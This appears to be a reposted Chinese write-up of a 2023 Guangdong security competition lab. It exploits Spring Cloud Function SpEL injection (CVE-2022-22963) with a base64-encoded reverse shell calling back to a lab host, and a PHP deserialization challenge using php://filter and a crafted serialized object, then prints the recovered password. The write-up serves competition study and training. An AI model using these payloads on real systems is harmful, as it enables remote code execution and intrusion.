2023年广东省网络安全C模块(笔记详解)

发布时间:2024年01月02日

前言

需要环境可以私聊

C模块:漏洞1

Server-Hun-1--1 172.16.106.248

SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。

Spring Cloud Function SpEL(CVE-2022-22963)远程代码执行漏洞

访问URL是报错页面,使用BurpSuite抓包:

构造反弹shell命令并进行base64加密

sh -i >& /dev/tcp/172.16.106.18/1212 0>&1

base64加密

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTA2LjE4LzEyMTIgMD4mMQ==}|{base64,-d}|{bash,-i}修改数据包发包监听

abc@123./

Server-w--2 172.16.106.247

Php反序列化,查看页面

发现要前往那个php这里使用php伪协议来获取内容

/?text=data:text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

解码

发现这个不完整把他加上反序列化

执行这个php代码

构造

?text=data:text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看源代码发现密码

文章来源:https://blog.csdn.net/weixin_57536426/article/details/135321826
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。